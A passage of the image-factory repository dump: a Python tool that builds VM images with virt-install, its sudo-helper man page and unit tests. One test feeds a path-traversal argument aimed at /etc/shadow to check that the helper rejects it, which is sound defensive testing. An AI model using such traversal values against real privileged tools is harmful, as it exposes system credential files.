mode.\"\"\"\n return subprocess.call(\n [self.SCRIPT] + cmd,\n stdout=subprocess.DEVNULL,\n env={\"DRYRUN\": \"1\"},\n stderr=subprocess.DEVNULL if silence else None,\n )\n\n def test_mount(self):\n \"\"\"Test mounting.\"\"\"\n cmd = [\"mount\", \"/dev/loop0\", \"/tmp/image-factory._3gm0lem\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_root(self):\n \"\"\"Test chmod mounted /root\"\"\"\n cmd = [\"chmod\", \"o+rwx\", \"/tmp/image-factory._3gm0lem/root\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_var_log(self):\n \"\"\"Test write access for mounted /var/log/...\"\"\"\n cmd = [\"chmod\", \"o+w\", \"/tmp/image-factory.8a9573rd/var/log\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_dnf_log(self):\n \"\"\"Test read access for dnf log file.\"\"\"\n cmd = [\"chmod\", \"o+r\", \"/tmp/image-factory.umh1oz39/var/log/anaconda/dnf.librepo.log\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_log_file(self):\n \"\"\"Test read access for mounted /var/log/...\"\"\"\n cmd = [\"chmod\", \"o+r\", \"/tmp/image-factory._3gm0lem/var/log/anaconda/journal.log\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_recursive(self):\n \"\"\"Test chmod recursively\"\"\"\n cmd = [\"chmod\", \"-R\", \"o+rwx\", \"/tmp/image-factory._3gm0lem/var/log/anaconda\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_remove_root(self):\n \"\"\"Test chmod remove mounted /root permission\"\"\"\n cmd = [\"chmod\", \"o-rwx\", \"/tmp/image-factory._3gm0lem/root\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_umount(self):\n \"\"\"Test unmounting.\"\"\"\n cmd = [\"umount\", \"/tmp/image-factory._3gm0lem\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_reject_escaping(self):\n \"\"\"Test rejecting ../../etc/shadow.\"\"\"\n cmd = [\"chmod\", \"o+rwx\", \"/tmp/image-factory._3gm0lem/../../etc/shadow\"]\n self.assertEqual(self.call_helper(cmd, silence=True), 1)\n" }, { "alpha_fraction": 0.6975964307785034, "alphanum_fraction": 0.7026271820068359, "avg_line_length": 40.604652404785156, "blob_id": "64caad75f36ddb4bdc7d8a6dda716d734c1a0b86", "content_id": "21a3bdf8edc7dbc9da2a665f5145d76e45d848e9", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1789, "license_type": "permissive", "max_line_length": 91, "num_lines": 43, "path": "/tests/test_isort.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2021, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run isort to check if Python import definitions are sorted.\"\"\"\n\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\n\nclass IsortTestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs isort to check if\n Python import definitions are sorted. The list of source files\n is provided by the get_source_files() function.\n \"\"\"\n\n def test_isort(self):\n \"\"\"Test: Run isort on Python source code.\"\"\"\n\n cmd = [\"isort\", \"--check-only\", \"--diff\", \"-l\", \"99\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n ) as process:\n output = process.communicate()[0].decode()\n\n if process.returncode != 0: # pragma: no cover\n self.fail(f\"isort found unsorted Python import definitions:\\n{output.strip()}\")\n" }, { "alpha_fraction": 0.7496473789215088, "alphanum_fraction": 0.7559943795204163, "avg_line_length": 24.781818389892578, "blob_id": "9ba695415ba882b7347c4d24044cd5bd575b1976", "content_id": "58068b20a91ef24a9d91dbfd0e8e7d90cc600ac4", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1418, "license_type": "permissive", "max_line_length": 78, "num_lines": 55, "path": "/image-factory-sudo-helper.1.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "---\ndate: 2020-08-05\nfooter: image-factory-sudo-helper\nheader: \"image-factory-sudo-helper's Manual\"\nlayout: page\nlicense: 'Licensed under the ISC license'\nsection: 1\ntitle: IMAGE-FACTORY-SUDO-HELPER\n---\n\n# NAME\n\nimage-factory-sudo-helper - Run certain commands as root\n\n# SYNOPSIS\n\n**image-factory-sudo-helper** **COMMAND**\n\n# DESCRIPTION\n\n**image-factory** can be run as normal user, but it need root permission for a\nfew operations like chmod, mount, and umount. Since these operations cannot be\nsecured with sudo's wildcards, **image-factory-sudo-helper** was introduced to\ncheck the commands using regular expression.\n\n**image-factory-sudo-helper** will take a command (including parameters) and\nchecks if it one of the three allowed commands:\n\n* chmod on files or (sub-)directories in /tmp/image-factory\n\n* mount of loop device in /tmp/image-factory\n\n* umount in /tmp/image-factory\n\nIf the given command passes is one of the allowed commands, it will be\nexecuted. Otherwise an error message will be printed.\n\n# USAGE\n\nTo allow running **image-factory** as normal user, only\n**image-factory-sudo-helper** needs sudo permission for the user. Example sudo\nconfiguration for user *jenkins*:\n\n```\njenkins ALL = NOPASSWD:SETENV: /usr/bin/image-factory-sudo-helper\n```\n\n# ENVIRONMENT\n\nIf the environment variable **DRYRUN** is set, the given command will not be\nexecuted but printed instead.\n\n# AUTHOR\n\nBenjamin Drung <[email protected]>\n" }, { "alpha_fraction": 0.6634935736656189, "alphanum_fraction": 0.6692051291465759, "avg_line_length": 35.859649658203125, "blob_id": "d3ca42350bcd388a7190108b79596ae90b302ed1", "content_id": "4b68a54303cef422badfbd281918c567b4e4f9f2", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2101, "license_type": "permissive", "max_line_length": 83, "num_lines": 57, "path": "/tests/__init__.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2017-2021, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Helper functions for testing.\"\"\"\n\nimport inspect\nimport os\nimport unittest\n\n\ndef get_source_files():\n \"\"\"Return a list of sources files/directories (to check with flake8/pylint).\"\"\"\n scripts = [\"image-factory\"]\n modules = [\"tests\"]\n py_files = []\n\n files = []\n for code_file in scripts + modules + py_files:\n is_script = code_file in scripts\n if not os.path.exists(code_file): # pragma: no cover\n # The alternative path is needed for Debian's pybuild\n alternative = os.path.join(os.environ.get(\"OLDPWD\", \"\"), code_file)\n code_file = alternative if os.path.exists(alternative) else code_file\n if is_script:\n with open(code_file, \"rb\") as script_file:\n shebang = script_file.readline().decode(\"utf-8\")\n if \"python\" in shebang:\n files.append(code_file)\n else:\n files.append(code_file)\n return files\n\n\ndef unittest_verbosity():\n \"\"\"\n Return the verbosity setting of the currently running unittest.\n\n If no test is running, return 0.\n \"\"\"\n frame = inspect.currentframe()\n while frame:\n self = frame.f_locals.get(\"self\")\n if isinstance(self, unittest.TestProgram):\n return self.verbosity\n frame = frame.f_back\n return 0 # pragma: no cover\n" }, { "alpha_fraction": 0.5823896527290344, "alphanum_fraction": 0.5932517051696777, "avg_line_length": 44.547367095947266, "blob_id": "930f1ccafad5fe089f2e231d602ad4495611f601", "content_id": "a7d1ad29385a0dec4e257df156ee6353086dd6a8", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4327, "license_type": "permissive", "max_line_length": 97, "num_lines": 95, "path": "/tests/test_cli.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2019, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Test command-line related functions from image-factory.\"\"\"\n\nimport configparser\nimport os\nimport unittest\nimport unittest.mock\n\nfrom image_factory import get_config, override_configs_by_args, parse_args\n\n\nclass TestCLI(unittest.TestCase):\n \"\"\"\n This unittest class tests command-line related functions from image-factory.\n \"\"\"\n\n @unittest.mock.patch(\"os.getuid\", unittest.mock.MagicMock(return_value=1000))\n def test_empty_config(self):\n \"\"\"Test empty configuration file.\"\"\"\n args = parse_args([\"Debian-10-server\"])\n config = configparser.ConfigParser()\n override_configs_by_args(config, args)\n self.assertTrue(config.has_section(\"Debian-10-server\"))\n self.assertEqual(\n config.items(\"Debian-10-server\"), [(\"cache_dir\", \"~/.cache/image-factory\")]\n )\n\n @unittest.mock.patch(\"os.getuid\", unittest.mock.MagicMock(return_value=1000))\n def test_example_config(self):\n \"\"\"Test exapmle image-factory.conf file.\"\"\"\n config_file = os.path.join(os.path.dirname(__file__), \"..\", \"image-factory.conf\")\n os.environ[\"IMAGE_FACTORY_CONFIG\"] = config_file\n args = parse_args([\"--format\", \"raw\", \"Debian-10-server\"])\n config = get_config()\n override_configs_by_args(config, args)\n self.assertTrue(config.has_section(\"Debian-10-server\"))\n self.assertEqual(\n config.items(\"Debian-10-server\"),\n [\n (\"data_dir\", \"/usr/share/image-factory\"),\n (\"cores\", \"1\"),\n (\"format\", \"raw\"),\n (\"keep-raw\", \"False\"),\n (\"installer-logs\", \"True\"),\n (\"log-file\", \"True\"),\n (\"ram\", \"1G\"),\n (\"centos_mirror\", \"http://ftp.rz.uni-frankfurt.de/pub/mirrors/centos\"),\n (\"debian_mirror\", \"rsync://ftp.de.debian.org/debian\"),\n (\"ubuntu_mirror\", \"http://de.archive.ubuntu.com/ubuntu\"),\n (\"fedora_mirror\", \"rsync://ftp.fau.de/fedora\"),\n (\"opensuse_mirror\", \"rsync://ftp.halifax.rwth-aachen.de/opensuse\"),\n (\"dist\", \"buster\"),\n (\n \"initrd\",\n \"rsync://ftp.de.debian.org/debian/dists/buster/main/installer-amd64/\"\n \"current/images/netboot/debian-installer/amd64/initrd.gz\",\n ),\n (\n \"linux\",\n \"rsync://ftp.de.debian.org/debian/dists/buster/main/installer-amd64/\"\n \"current/images/netboot/debian-installer/amd64/linux\",\n ),\n (\"preseed\", \"/usr/share/image-factory/Debian-10-server-de.cfg\"),\n (\n \"append\",\n \"auto-install/enable=true keymap=us hostname=debian \"\n \"domain=unassigned-domain vga=771 d-i -- quiet\",\n ),\n (\"vnc\", \"localhost:13\"),\n (\"cache_dir\", \"~/.cache/image-factory\"),\n ],\n )\n\n def test_override_cache_dir(self):\n \"\"\"Test overriding the cache directory.\"\"\"\n args = parse_args([\"--cache-dir\", \"/var/cache/example\", \"Debian-10-server\"])\n config = configparser.ConfigParser()\n config[config.default_section] = {}\n config[config.default_section][\"cache_dir\"] = \"~/.cache/image-factory\"\n override_configs_by_args(config, args)\n self.assertTrue(config.has_section(\"Debian-10-server\"))\n self.assertEqual(config.items(\"Debian-10-server\"), [(\"cache_dir\", \"/var/cache/example\")])\n" }, { "alpha_fraction": 0.5966116786003113, "alphanum_fraction": 0.6020557284355164, "avg_line_length": 37.043277740478516, "blob_id": "c9741d97f9db580eefd612b1fca2dcbc86a2513b", "content_id": "f8dffe09d51ad1662a8b65005c2b331c50dd3ec5", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24614, "license_type": "permissive", "max_line_length": 99, "num_lines": 647, "path": "/image-factory", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\n# Copyright (C) 2014-2020, IONOS SE\n# Author: Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n# pylint: disable=invalid-name\n# pylint: enable=invalid-name\n\nimport argparse\nimport configparser\nimport datetime\nimport errno\nimport glob\nimport hashlib\nimport logging\nimport os\nimport re\nimport shutil\nimport stat\nimport subprocess\nimport sys\nimport tempfile\n\nimport httplib2\nimport parted\n\nDEFAULT_IMAGE_SIZE = \"2G\"\nDEFAULT_LOGGING_FORMAT = \"%(asctime)s %(name)s [%(process)d] %(levelname)s: %(message)s\"\nGUEST_HTTP_SERVER = \"10.0.2.4\"\n_UNSET = object()\nLOSETUP = \"/sbin/losetup\"\nZEROFREE = \"/usr/sbin/zerofree\"\n__logger_name__ = os.path.basename(sys.argv[0]) if __name__ == \"__main__\" else __name__\n\n\ndef get_config():\n \"\"\"Return a config parser object.\n\n The configuration is tried to be read in this order:\n 1) User configuration file: ~/.config/image-factory.conf\n 2) System configuration file: /etc/image-factory.conf\n\n You can override the usage of the configuration files from\n point 1 and 2 by specifying a configuration file in the\n IMAGE_FACTORY_CONFIG environment variable.\n \"\"\"\n config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n env_name = \"IMAGE_FACTORY_CONFIG\"\n if env_name in os.environ:\n config_files = [os.environ[env_name]]\n if not os.path.isfile(config_files[0]):\n raise Exception(\n \"'\" + config_files[0] + \"' (set in \" + env_name + \") is not a valid file.\"\n )\n else:\n config_files = [\n \"/etc/image-factory.conf\",\n os.path.expanduser(\"~/.config/image-factory.conf\"),\n ]\n config.read(config_files)\n return config\n\n\ndef call_command(command, as_root=False):\n \"\"\"Run a given command and check if the command returns 0. Otherwise fail.\"\"\"\n if as_root and os.getuid() != 0:\n command = [\"sudo\", \"image-factory-sudo-helper\"] + command\n escaped_command = []\n for argument in command:\n if \" \" in argument:\n escaped_command.append('\"' + argument.replace('\"', r\"\\\"\") + '\"')\n else:\n escaped_command.append(argument)\n logger = logging.getLogger(__logger_name__)\n logger.info(\"Calling %s\", \" \".join(escaped_command))\n return_code = subprocess.call(command)\n if return_code != 0:\n logger.error(\"'%s' failed with exit code %i.\", \" \".join(command), return_code)\n sys.exit(return_code)\n\n\ndef create_raw_image(filename, size):\n \"\"\"Create a virtual raw image.\"\"\"\n cmd = [\"qemu-img\", \"create\", \"-f\", \"raw\", filename, size]\n call_command(cmd)\n\n\ndef create_url(image):\n return \"http://\" + GUEST_HTTP_SERVER + \"/\" + image\n\n\ndef get_default_cache_dir():\n \"\"\"Return the default cache directory.\"\"\"\n if os.getuid() == 0:\n cache_dir = \"/var/cache/image-factory\"\n else:\n cache_dir = \"~/.cache/image-factory\"\n return cache_dir\n\n\ndef cache_file(cache_dir, source):\n \"\"\"Cache a file locally and return the relative location of the cached file.\"\"\"\n logger = logging.getLogger(__logger_name__)\n if not os.path.exists(cache_dir):\n logger.info(\"Creating directory %s\", cache_dir)\n os.makedirs(cache_dir)\n relative_destination = os.path.basename(source)\n destination = os.path.join(cache_dir, relative_destination)\n if source.startswith(\"file:\") or source.startswith(\"/\"):\n logger.info(\"Copying '%s' to cache '%s'...\", source, destination)\n shutil.copy(source, destination)\n elif source.startswith(\"http:\") or source.startswith(\"https:\"):\n logger.info(\"Downloading %s...\", source)\n http_client = httplib2.Http(cache_dir)\n http_client.ignore_etag = True\n (response, content) = http_client.request(source)\n if response.fromcache:\n logger.info(\"Copy cached download to %s...\", destination)\n else:\n logger.info(\"Save download to %s...\", destination)\n with open(destination, \"wb\") as cached_file:\n cached_file.write(content)\n elif source.startswith(\"rsync:\"):\n call_command([\"rsync\", \"--no-motd\", source, destination])\n else:\n raise Exception(f\"No download handler for file '{source}' found.\")\n return relative_destination\n\n\ndef download_and_publish(config, image, source, filename):\n destination = os.path.join(config.get(\"http\", \"path\"), image, filename)\n target_dir = os.path.dirname(destination)\n logger = logging.getLogger(__logger_name__)\n if not os.path.exists(target_dir):\n logger.info(\"Creating directory %s\", target_dir)\n os.makedirs(target_dir)\n if source.startswith(\"file:\") or source.startswith(\"/\"):\n logger.info(\"Copying %s to %s\", source, destination)\n shutil.copyfile(source, destination)\n elif source.startswith(\"http:\") or source.startswith(\"https:\"):\n logger.info(\"Downloading %s...\", source)\n http_client = httplib2.Http(os.path.join(config[image][\"cache_dir\"], image))\n http_client.ignore_etag = True\n (response, content) = http_client.request(source)\n if response.fromcache:\n logger.info(\"Copy cached download to %s...\", destination)\n else:\n logger.info(\"Save download to %s...\", destination)\n with open(destination, \"wb\") as cached_file:\n cached_file.write(content)\n elif source.startswith(\"rsync:\"):\n call_command([\"rsync\", \"--no-motd\", source, destination])\n else:\n raise Exception(f\"No download handler for file '{source}' found.\")\n return destination\n\n\ndef check_one_partition(partitions, image):\n \"\"\"Checks that the image has only one partition.\n\n The image-handler (that adds the root password and SSH keys to instantiate\n the template) requires that there is only one partition in the image.\n \"\"\"\n if len(partitions) != 1:\n if partitions:\n msg = f\"{len(partitions)} partitions ({', '.join(partitions)})\"\n else:\n msg = \"no partitions\"\n logger = logging.getLogger(__logger_name__)\n logger.error(\"Expected exactly one partition in %s, but found %s.\", image, msg)\n sys.exit(1)\n\n\ndef parse_bytes(data):\n \"\"\"Parse bytes from given string.\n\n The SI prefixes (kB, MB, etc.) and binary prefixes (KiB, MiB, etc.) are supported.\n For backward compatibility, the units K, M, and G are mapped to KiB, MiB, and GiB.\n \"\"\"\n match = re.match(r\"^([0-9]+)\\s*([kMGTPE]?B|[KMGTPE]iB|[KMGTPE])$\", data.strip())\n if not match:\n raise ValueError(\n f\"Failed to parse bytes from '{data}'. \"\n \"Please use SI or binary prefixes for bytes (e.g. '2 GB' or '512 MiB').\"\n )\n\n value = int(match.group(1))\n unit = match.group(2)\n if unit.endswith(\"iB\"):\n value *= 1 << (10 * {\"KiB\": 1, \"MiB\": 2, \"GiB\": 3, \"TiB\": 4, \"PiB\": 5, \"EiB\": 6}[unit])\n elif unit.endswith(\"B\"):\n value *= 10 ** (3 * {\"\": 0, \"kB\": 1, \"MB\": 2, \"GB\": 3, \"TB\": 4, \"PB\": 5, \"EB\": 6}[unit])\n else:\n value *= 1 << (10 * {\"K\": 1, \"M\": 2, \"G\": 3, \"T\": 4, \"P\": 5, \"E\": 6}[unit])\n return value\n\n\ndef get_session():\n \"\"\"Return the session to use with virt-install.\"\"\"\n if os.getuid() == 0:\n session = \"qemu:///system\"\n else:\n session = \"qemu:///session\"\n return session\n\n\ndef run_installation(config, image, image_name): # pylint: disable=too-many-locals\n cores = config.get(image, \"cores\", fallback=\"1\")\n ram_in_mib = parse_bytes(config.get(image, \"ram\")) >> 20\n\n cache_dir = os.path.join(config[image][\"cache_dir\"], image)\n if config.has_option(image, \"installer_image\"):\n installer_image = cache_file(cache_dir, config.get(image, \"installer_image\"))\n location = os.path.join(cache_dir, installer_image)\n else:\n initrd = cache_file(cache_dir, config.get(image, \"initrd\"))\n kernel = cache_file(cache_dir, config.get(image, \"linux\"))\n location = f\"{cache_dir},kernel={kernel},initrd={initrd}\"\n\n append = config.get(image, \"append\", fallback=\"\")\n if config.has_option(image, \"preseed\"):\n initrd_inject = config.get(image, \"preseed\")\n append = f\"preseed/url=file:///{os.path.basename(initrd_inject)} {append}\"\n if config.has_option(image, \"kickstart\"):\n initrd_inject = config.get(image, \"kickstart\")\n append = f\"ks=file:///{os.path.basename(initrd_inject)} {append}\"\n append = f\"inst.ks=file:///{os.path.basename(initrd_inject)} {append}\"\n if config.has_option(image, \"yast\"):\n initrd_inject = config.get(image, \"yast\")\n append = f\"autoyast=file:///{os.path.basename(initrd_inject)} {append}\"\n\n network = \"user,model=virtio\"\n if config.has_option(image, \"mac\"):\n network += \",mac=\" + config.get(image, \"mac\")\n\n graphics = \"none\"\n if config.has_option(image, \"vnc\"):\n listen, port = config.get(image, \"vnc\").split(\":\")\n graphics = f\"vnc,port={5900 + int(port)}\"\n if listen:\n graphics += f\",listen={listen}\"\n\n session = get_session()\n cmd = [\n \"virt-install\",\n \"--connect\",\n session,\n \"--noreboot\",\n \"--wait\",\n \"-1\",\n \"--name\",\n image_name,\n \"--vcpus\",\n cores,\n \"--memory\",\n str(ram_in_mib),\n \"--disk\",\n \"path=\" + image_name + \",bus=virtio,format=raw\",\n \"--network\",\n network,\n \"--graphics\",\n graphics,\n \"--console\",\n \"pty,target_type=serial\",\n \"--noautoconsole\",\n \"--location\",\n location,\n \"--extra-args\",\n append,\n \"--initrd-inject\",\n initrd_inject,\n ]\n\n try:\n call_command(cmd)\n except KeyboardInterrupt:\n call_command([\"virsh\", \"-c\", session, \"destroy\", image_name])\n raise\n finally:\n call_command([\"virsh\", \"-c\", session, \"undefine\", image_name])\n\n\ndef open_as_user(filename, encoding):\n # pylint: disable=consider-using-with\n try:\n fileobject = open(filename, encoding=encoding)\n except IOError as error:\n if error.errno == errno.EACCES:\n call_command([\"chmod\", \"o+r\", filename], as_root=True)\n fileobject = open(filename, encoding=encoding)\n else:\n raise\n return fileobject\n\n\ndef remove(path, recursive=False):\n logger = logging.getLogger(__logger_name__)\n parent_dir = os.path.dirname(path)\n missing_permission = not os.access(parent_dir, os.W_OK)\n if missing_permission:\n # Assert that others cannot write (so we correct remove the other write bits later again)\n assert os.stat(parent_dir).st_mode & stat.S_IWOTH == 0\n call_command([\"chmod\", \"o+w\", parent_dir], as_root=True)\n try:\n if os.path.isdir(path):\n logger.info(\"Removing directory %s\", path)\n if recursive:\n call_command([\"chmod\", \"-R\", \"o+rwx\", path], as_root=True)\n shutil.rmtree(path)\n else:\n os.rmdir(path)\n else:\n logger.info(\"Removing file %s\", path)\n os.remove(path)\n finally:\n if missing_permission:\n call_command([\"chmod\", \"o-w\", parent_dir], as_root=True)\n\n\ndef remove_logs(tmpdir, print_installer_logs):\n root_dir = os.path.join(tmpdir, \"root\")\n missing_permission = not os.access(root_dir, os.W_OK)\n if missing_permission:\n # Assert that others cannot read/write/execute.\n # Then we can correctly remove the permissions again later (without altering the state).\n assert os.stat(root_dir).st_mode & (stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH) == 0\n call_command([\"chmod\", \"o+rwx\", root_dir], as_root=True)\n\n try:\n # Fix read permission for log directories (that we will remove later)\n check_directories = glob.glob(os.path.join(tmpdir, \"var/adm/autoinstall/*\")) + glob.glob(\n os.path.join(tmpdir, \"var/log/YaST2\")\n )\n for directory in check_directories:\n if os.path.isdir(directory) and not os.access(directory, os.R_OK):\n call_command([\"chmod\", \"-R\", \"o+rx\", directory], as_root=True)\n\n # Print installer logs\n installer_logs = (\n glob.glob(os.path.join(tmpdir, \"root/anaconda-ks.cfg\"))\n + glob.glob(os.path.join(tmpdir, \"var/adm/autoinstall/logs/*\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/anaconda.*\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/anaconda/*\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/installer/syslog\"))\n + glob.glob(os.path.join(tmpdir, \"var/log/YaST2/y2log\"))\n )\n if print_installer_logs:\n logger = logging.getLogger(__logger_name__)\n for installer_log in installer_logs:\n content = open_as_user(installer_log, encoding=\"utf-8\").read()\n logger.info(\"Content of /%s:\\n%s\", os.path.relpath(installer_log, tmpdir), content)\n\n # Remove installer logs\n remove_log_globs = [\n \"root/anaconda-ks.cfg\",\n \"root/install.log*\",\n \"var/adm/autoinstall\",\n \"var/lib/YaST2\",\n \"var/log/anaconda\",\n \"var/log/installer\",\n \"var/log/YaST2\",\n ]\n for log_glob in remove_log_globs:\n for log in glob.glob(os.path.join(tmpdir, log_glob)):\n remove(log, recursive=True)\n finally:\n if missing_permission:\n call_command([\"chmod\", \"o-rwx\", root_dir], as_root=True)\n\n\ndef post_installation(script_name, image, print_installer_logs):\n logger = logging.getLogger(__logger_name__)\n device = parted.getDevice(image)\n try:\n disk = parted.Disk(device)\n except parted.DiskLabelException as error:\n logger.error(\"Failed to read the disk %s. Maybe the disk is still empty?\", error)\n sys.exit(1)\n check_one_partition(disk.partitions, image)\n partition = disk.partitions[0]\n offset = partition.geometry.start * device.sectorSize\n loopdev = None\n try:\n cmd = [LOSETUP, \"-o\", str(offset), \"--show\", \"-f\", image]\n logger.info(\"Calling %s\", \" \".join(cmd))\n with subprocess.Popen(cmd, stdout=subprocess.PIPE) as process:\n loopdev = process.communicate()[0].decode().strip()\n\n tmpdir = tempfile.mkdtemp(prefix=script_name + \".\")\n call_command([\"mount\", loopdev, tmpdir], as_root=True)\n\n try:\n remove_logs(tmpdir, print_installer_logs)\n finally:\n call_command([\"umount\", tmpdir], as_root=True)\n shutil.rmtree(tmpdir)\n\n call_command([ZEROFREE, loopdev])\n\n finally:\n if loopdev:\n cmd = [LOSETUP, \"-d\", loopdev]\n logger.info(\"Calling %s\", \" \".join(cmd))\n return_code = subprocess.call(cmd)\n if return_code != 0:\n logger.warning(\"losetup failed with exit code %i.\", return_code)\n\n\ndef create_hashsum(image):\n logger = logging.getLogger(__logger_name__)\n logger.info(\"Calculating SHA 256 sum of %s...\", image)\n with open(image, \"rb\") as image_file:\n sha256_sum = hashlib.sha256(image_file.read()).hexdigest()\n logger.info(\"SHA 256 sum of %s: %s\", image, sha256_sum)\n with open(image + \".sha256sum\", \"w\", encoding=\"utf-8\") as checksum_file:\n checksum_file.write(sha256_sum + \" \" + image + \"\\n\")\n\n\ndef create_qcow2(image, keep_raw_image):\n qcow2_name = os.path.splitext(image)[0] + \".qcow2\"\n call_command([\"qemu-img\", \"convert\", \"-O\", \"qcow2\", image, qcow2_name])\n if not keep_raw_image:\n try:\n logger = logging.getLogger(__logger_name__)\n logger.info(\"Removing %s...\", image)\n os.remove(image)\n except FileNotFoundError:\n pass\n create_hashsum(qcow2_name)\n return qcow2_name\n\n\ndef upload_image(config, image, image_file, checksum_file):\n \"\"\"Try to upload image.\n\n Upload the image to all destinatons that are listed in 'upload_destinations'.\n The 'upload_destinations' variable is a comma-separated list of sections.\n To disable the upload, let 'upload_destinations' undefined or set to an empty string.\n Every section has to set 'upload_type' and 'upload_target'. You could specify\n 'upload_args', 'post-upload-command', and 'post-upload-command' with a number suffix\n (counting up from 1). ${image} can be used as parameter in post-upload-command.\n \"\"\"\n logger = logging.getLogger(__logger_name__)\n destinations = config.get(image, \"upload_destinations\", fallback=\"\").split(\",\")\n for destination in [d.strip() for d in destinations if d.strip() != \"\"]:\n try:\n upload_type = config.get(destination, \"upload_type\")\n except (configparser.NoOptionError, configparser.NoSectionError):\n logger.error(\n \"No 'upload_type' defined in the upload destination section '%s'.\", destination\n )\n sys.exit(1)\n if upload_type.lower() == \"rsync\":\n try:\n upload_target = config.get(destination, \"upload_target\")\n except (configparser.NoOptionError, configparser.NoSectionError):\n logger.error(\n \"No 'upload_target' defined in the upload destination section '%s'.\",\n destination,\n )\n sys.exit(1)\n command = [\"rsync\"]\n if config.has_option(destination, \"upload_args\"):\n command += [\n a for a in config.get(destination, \"upload_args\").split(\" \") if a.strip() != 